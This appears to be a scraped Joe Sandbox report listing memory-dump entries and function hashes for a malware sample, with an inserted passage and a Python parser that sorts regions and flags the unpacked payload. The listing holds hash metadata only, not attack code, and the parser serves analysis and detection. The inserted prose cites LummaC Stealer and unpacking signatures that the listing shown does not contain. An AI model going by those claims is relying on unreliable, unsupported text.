• Instruction Fuzzy Hash: A3B12536A083129BC724CF28C88056BB7E2FF99700F19953DEA8697366E735DC06D785
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c637dafc4c5c02bba21bf8384fb5f02d2acdfb7e2cfb5a4e70ebd11587584d3
• Instruction ID: 7d52404cd5ed0818def8007ad454468f2dc10da8b6269fbf78b5191b8b1219fc
• Opcode Fuzzy Hash: 3c637dafc4c5c02bba21bf8384fb5f02d2acdfb7e2cfb5a4e70ebd11587584d3
• Instruction Fuzzy Hash: 2BB1C072908311EFD720AF24DC45B1ABBE2BF94350F144A2CF4D8972A1D77A9D25CB42
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 98cb35be4dcf6147bb54d841e08aa9a7e406920ae8f199def00657b733b42f8a
                                                                                                                                                                                                                                                                        • Instruction ID: 8a51dd8e2965cc9f0c4013a2f6a7698077ed2e8ce9dcff126952d1e9ceec8530
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98cb35be4dcf6147bb54d841e08aa9a7e406920ae8f199def00657b733b42f8a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFB15579904301AFDB108F25DC41B5ABBE2BFD8314F144A3EF898932A1D776DD668B06
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: dd71efafbe3cc21deb18af7b1feb0adcacd6565e9113104d404282071b8f505b
                                                                                                                                                                                                                                                                        • Instruction ID: 3d68927155322c9fb77b85783295356b4f075228d206aee41bca5164af2677f0
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd71efafbe3cc21deb18af7b1feb0adcacd6565e9113104d404282071b8f505b
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 259124B2A043119BE7249F24CC92B6BB3B5EFD1314F14482CE9869B382E779ED05C756
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                                                                                                                                                                                                                                        • Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: d66196a234f06480f41816911af9b4ea699047e9e12ae4b8e975acb0d7698cc7
                                                                                                                                                                                                                                                                        • Instruction ID: c9c48577c6a5ac8b4f0e8579aaa165d9faf68c4f9f768de92058a807ec063e88
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d66196a234f06480f41816911af9b4ea699047e9e12ae4b8e975acb0d7698cc7
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8A1F5729183228BC724CF24C9916ABB7F1FFD4750F1A8A2DD8C59B664E7389D41C781
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 73df037b7ed471f27b11ebbe38ccb4fbfbef165bc0754b8ed2e20a33442e0b7b
                                                                                                                                                                                                                                                                        • Instruction ID: 508a6b3ef77f72f40b03bf8568c6893e650a3a08a9226c1bc078d339eb410ccd
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73df037b7ed471f27b11ebbe38ccb4fbfbef165bc0754b8ed2e20a33442e0b7b
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17A1E1366042018BC718DF28C99092BB3E2FFD9710F2A857CE9869B355EB35EC11DB41
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                        • Instruction ID: e8c9f4ebddd6112809fd69e01deab0a06f5a2ad4e98795230358669560bc0e5b
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EDC14CB2A487418FC360CF68DC96BABB7F1BF85318F08492DD1D9C6242E778A155CB46
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                        • Instruction ID: afe5d4654f5e8657962bc42cc500043a3620e9a043509faccf93fb76782c58a6
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
• Instruction Fuzzy Hash: DBC15BB29087418FC360CF28DC96BABB7F1BF85318F09492DD1DAD6242E778A155CB46
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eca7b8087cccba19e5979cf0e8330dd1936bd6a3fecaafeec36cf51b3ab145d2
• Instruction ID: 652f8e9b795bdad566c10a3835dfc4d237c9f110778e3a4e594c84154d78986c
• Opcode Fuzzy Hash: eca7b8087cccba19e5979cf0e8330dd1936bd6a3fecaafeec36cf51b3ab145d2
• Instruction Fuzzy Hash: 43914C72754B1A4BC714DE6CDC9066EB6D2ABD4210F4D423CD8958B3C2EF78AD0587C5
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
• Instruction ID: 89cd8c3f6ac805753dcfa7ea52abb159a623b373aaffce4ab273b97bd3830c78
• Opcode Fuzzy Hash: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
• Instruction Fuzzy Hash: CFB10575608790DFD714DF24E891A2BB7E2EF8A314F488A6DF0D5872A2D7388905CB16
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2bb226d847c6d85160f6813aeae79ffa1446c0b5c4b11e29441bf99546017c60
• Instruction ID: a8c5839adc9431cc2a6c39ee72d7991f3aac8862d0411320568e8fc2ba71ea3c
• Opcode Fuzzy Hash: 2bb226d847c6d85160f6813aeae79ffa1446c0b5c4b11e29441bf99546017c60
• Instruction Fuzzy Hash: C5816B36A043419BC7189F28C89097FB7A2FFD5720F2AC57CE9868B255EB349C51D781
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
• Instruction ID: cf6a0fb400f3c0121e69896af41eb3d2a2b4280c5d577effd33442f2baf9bc8c
• Opcode Fuzzy Hash: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
• Instruction Fuzzy Hash: CB81AE326053019BC7249F29C85067FB3A2FFC8710F2AD42DE9868B395EB349C52D785
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b868a3013f37864ed973b3668e501d643bc9a4679fe388745f9f5cf196745faa
• Instruction ID: b8f175c2a438b8fa9fd84951f7ca8927f7c1a9295019846622971d18a0a3fff6
• Opcode Fuzzy Hash: b868a3013f37864ed973b3668e501d643bc9a4679fe388745f9f5cf196745faa
• Instruction Fuzzy Hash: 1F51F0347082409BE7189F29C89567FB7E2FB96320F28892CD9D5972A1D778EC41CB42
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
• Instruction ID: ba880319810bdb8e213e259538359e713a98a4b2945b2457ae3d4c78796ecc2a
• Opcode Fuzzy Hash: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
• Instruction Fuzzy Hash: 47512A357043008FE7188F28C89577BB7E2EB9A320F18A62ED5D597392D7389C41C78A
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 348a960796a6df68399cabf459a6c70aaca195daff6aee637ae217081242f236
• Instruction ID: 1208cea31e140737ac547d8a59219ac8887f44e589219f7efabaffcb15995a43
• Opcode Fuzzy Hash: 348a960796a6df68399cabf459a6c70aaca195daff6aee637ae217081242f236
• Instruction Fuzzy Hash: D1712572A042614FC725CE28984175EBBD1BB95360F29823DE8B98B3D2D779CC06D7C1
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2a5610294b30e5e8a679adaf8088138694fc7c481e66a98cc5ba01ae8c02aa6d
• Instruction ID: c8e85d340764d3b4d6a043baf240a448254d236dbbdea7acc366692660b189d4
• Opcode Fuzzy Hash: 2a5610294b30e5e8a679adaf8088138694fc7c481e66a98cc5ba01ae8c02aa6d
• Instruction Fuzzy Hash: C87129B2A042614FC7158E28D84139FBBD1BB95324F18863EE8B9873D2D779C84AD7C1
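The entries in this listing alternate between two dump sources: the image-backed region at 0x400000 (based on PE: true) and the non-PE, executable-and-writable allocation at 0x710000 that carries Yara matches, which is the region the report's "Detected unpacking" and "Yara detected LummaC Stealer" signatures point at. The following Python is an added example, not part of the Joe Sandbox report: it parses this "Memory Dump Source" block format, groups recovered Opcode IDs by region, and flags regions matching that unpacked-payload pattern. The meaning of the dotted fields in the .sdmp file name (field 4 = region base, field 5 = Windows page protection, field 7 = MEM_* region type) is an assumption inferred from the values in this report, not documented Joe Sandbox semantics; the constructed sample text is two entries copied from above with the indentation removed and the fused "Download File" link text left in place so the parser handles it.

```python
"""Parse Joe Sandbox "Memory Dump Source" entries and group recovered functions by memory region."""
import re
from dataclasses import dataclass, field

# Windows memory constants. That two fields of the .sdmp name carry them is an assumption (see parse_sdmp_name).
PAGE_EXECUTE_READWRITE = 0x40
MEM_IMAGE = 0x1000000   # region is a mapped PE image
MEM_PRIVATE = 0x20000   # region was allocated at run time (VirtualAlloc and friends)

# Constructed sample: two entries copied from the report with indentation removed ("Download File" link text kept).
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
• Instruction ID: cf6a0fb400f3c0121e69896af41eb3d2a2b4280c5d577effd33442f2baf9bc8c
• Opcode Fuzzy Hash: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
• Instruction Fuzzy Hash: CB81AE326053019BC7249F29C85067FB3A2FFC8710F2AD42DE9868B395EB349C52D785
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b868a3013f37864ed973b3668e501d643bc9a4679fe388745f9f5cf196745faa
• Instruction ID: b8f175c2a438b8fa9fd84951f7ca8927f7c1a9295019846622971d18a0a3fff6
• Opcode Fuzzy Hash: b868a3013f37864ed973b3668e501d643bc9a4679fe388745f9f5cf196745faa
• Instruction Fuzzy Hash: 1F51F0347082409BE7189F29C89567FB7E2FB96320F28892CD9D5972A1D778EC41CB42
"""

SOURCE_RE = re.compile(r"Source File:\s*(\S+\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
KV_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")


@dataclass
class DumpEntry:
    source_file: str = ""
    offset: int = 0            # region base the report prints as "Offset"
    based_on_pe: bool = False  # true when the dump is a mapped PE image
    yara_match: bool = False   # the report shows a "Yara matches" heading only for regions with hits
    fields: dict = field(default_factory=dict)  # Opcode ID, Instruction ID, fuzzy hashes, ...


def parse_sdmp_name(name):
    """Split an .sdmp name into fields. Assumed meaning, inferred from this report's values:
    field 4 = region base, field 5 = page protection, field 7 = MEM_* region type."""
    parts = (name[:-5] if name.endswith(".sdmp") else name).split(".")
    if len(parts) != 8:
        raise ValueError("unexpected sdmp name: " + name)
    return {"base": int(parts[3], 16), "protect": int(parts[4], 16), "type": int(parts[6], 16)}


def parse_entries(text):
    """One DumpEntry per "Memory Dump Source" block; headings without a colon are skipped."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = DumpEntry()
            entries.append(cur)
        elif cur is None:
            continue  # stray lines before the first block (e.g. the tail of a previous entry)
        elif line == "Yara matches":
            cur.yara_match = True
        elif (m := KV_RE.match(line)):
            key, value = m.group(1).strip(), m.group(2).strip()
            if value.endswith("Download File"):  # link text fused onto the value by page extraction
                value = value[:-len("Download File")].strip()
            sm = SOURCE_RE.search(line) if key == "Source File" else None
            if sm:
                cur.source_file, cur.offset = sm.group(1), int(sm.group(2), 16)
                cur.based_on_pe = sm.group(3) == "true"
            else:
                cur.fields[key] = value
    return entries


def functions_by_region(entries):
    """Region base -> sorted unique Opcode IDs recovered from that region."""
    out = {}
    for e in entries:
        if e.fields.get("Opcode ID"):
            out.setdefault(e.offset, set()).add(e.fields["Opcode ID"])
    return {base: sorted(ids) for base, ids in out.items()}


def unpacked_code_regions(entries):
    """Bases fitting the report's 'Detected unpacking' pattern: RWX, not PE-backed, Yara hit."""
    hits = []
    for e in entries:
        info = parse_sdmp_name(e.source_file) if e.source_file else {"protect": 0}
        rwx = info["protect"] == PAGE_EXECUTE_READWRITE
        if rwx and not e.based_on_pe and e.yara_match and e.offset not in hits:
            hits.append(e.offset)
    return hits
```

Run over the whole listing, `unpacked_code_regions` returns only 0x710000 for this report, and `functions_by_region` gives the set of Opcode IDs per region so the functions carved from the unpacked allocation can be separated from those of the on-disk image when building detections.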
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 29143899424894e7b8e427b1e6e1f66170dacedfe65da3d43b0f1d8a79b00b20
                                                                                                                                                                                                                                                                        • Instruction ID: 98ca7c1ce395a788f5e1010e2847c20591c61247ad60d4a8de0f638288881ae6
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29143899424894e7b8e427b1e6e1f66170dacedfe65da3d43b0f1d8a79b00b20
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34614836749AE04BD3288E3C6C612AABA934FD2234F2DC77DE5F58B3E1D5698C058341
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 29143899424894e7b8e427b1e6e1f66170dacedfe65da3d43b0f1d8a79b00b20
                                                                                                                                                                                                                                                                        • Instruction ID: 4c2c0ab1878e9cfa13c7d80eb19278cb3d77386feaf759a830bf0c171a5c4840
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29143899424894e7b8e427b1e6e1f66170dacedfe65da3d43b0f1d8a79b00b20
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C613B3A7496C047D3288E3D4C112AABA934BD7230F2CC77EEDF6873E1D56988469355
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
                                                                                                                                                                                                                                                                        • Instruction ID: 19c9bc1ea9186e56c23c5e66cc144f5345884b6a785bfb5c303e44cb60fc86fa
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 915126746083009BE7109F29DC45B2BB7E6EB89704F14982DF5C597292DB39DC05CBAB
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 0288cd3b192f347070e81ea7353e08bb5565fcf5553c08da131d7bc18d8c1a13
                                                                                                                                                                                                                                                                        • Instruction ID: 73e47d366638b20939725034334a8917b9fea867cebd6307f48cd3e6d279f89a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0288cd3b192f347070e81ea7353e08bb5565fcf5553c08da131d7bc18d8c1a13
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE5149B16087548FE314DF29D89435BBBE1BBC8314F144A2DE5E987390E379DA08CB82
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 0288cd3b192f347070e81ea7353e08bb5565fcf5553c08da131d7bc18d8c1a13
                                                                                                                                                                                                                                                                        • Instruction ID: 583c87d3fd9d435e842b0babbfef0573c90b7f3422fd301491a952917507ab78
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0288cd3b192f347070e81ea7353e08bb5565fcf5553c08da131d7bc18d8c1a13
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E516DB15087549FE314DF29D49435BBBE1BBC8318F044E2EE4E987390E379DA088B96
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 516e6924cf22855bcc51b03261ade72ba20a7268c254d95cb2793a6fa0abd341
                                                                                                                                                                                                                                                                        • Instruction ID: 9771fb71b568a532e76707a1d1884c3ee6c11895fa7013b2ef8fb4ba66f08137
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 516e6924cf22855bcc51b03261ade72ba20a7268c254d95cb2793a6fa0abd341
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24519C71A493458FE7208B2888802E6BBD2DF99364F4DC67CD5A44B3D7E23D9909D381
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
                                                                                                                                                                                                                                                                        • Instruction ID: 6e37d88637f30dcf1ca5a39760ca9fc235c391d288c19f204446c63a880f3ae7
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0951AE30B483648FD710DA28A480267BBD2DF95320F8A867ED4D44B3D6E67DD90DD389
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
